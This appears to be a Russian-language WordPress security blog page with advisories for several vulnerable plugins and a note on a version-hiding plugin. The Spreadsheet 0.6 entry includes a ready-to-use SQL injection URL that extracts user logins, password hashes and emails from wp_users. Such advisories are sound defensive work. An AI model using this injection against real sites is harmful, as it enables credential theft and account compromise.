Плагины
Уязвимость в плагине Wordpress Spreadsheet 0.6
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ss_id» сценарием ss_load.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+ (1=0)+union+select+1,concat(user_login,0×3a,user_pass,0×3a,user_email), 3,4+from+wp_users–&display=plain
Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets
Очередная порция уязвимостей в нескольких плагинах WordPress. Если Вы используете какие-то из этих плагинов, рекомендую отключить их, до выхода новых версий плагинов с исправлениями уязвимостей.
WP People <= 1.6 уязвимость SQL иньекция. Параметр person некорректно фильтруется. Это может быть использовано для нарушения работы базы данных WordPress блога.
Simple Forum < 2.1 (Build 237) Параметры Forum и Topic […]
Уязвимость плагина WP-Photo-Album
Найдена уязвимость в плагине WP-Photo-Album, позволяющая злоумышленнику, делать удаленные запросы к MySQL базе данных блога.
Рекомендуется отключить плагин, до выхода исправлений.
Обновлен плагин wp-no-version
Плагин предназначен для осложнения идентификации версии WordPress которая установлена на вашем блоге.
В последнем релизе, плагин не убирает отображение версии WordPress для зарегистрированных пользователей. Это было сделано, для поддержки функции автоматической проверки обновлений WordPress.
Скачать свежую версию плагина можно здесь.
Работоспособность плагина, проверена на WordPress 2.3.3.

